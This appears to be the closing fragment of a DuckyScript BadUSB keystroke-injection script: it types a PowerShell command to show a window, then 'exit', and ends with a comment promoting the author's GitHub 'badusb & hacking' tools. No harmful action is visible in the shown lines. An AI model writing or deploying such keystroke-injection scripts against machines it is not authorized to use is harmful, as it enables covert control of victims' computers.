-ENTER
-DELAY 500
-STRING $Window.ShowDialog()
-DELAY 500
-ENTER
-DELAY 2000
-STRING exit
-DELAY 500
-ENTER
-REM check out my github at github.com/markcyber for more badusb & hacking type tools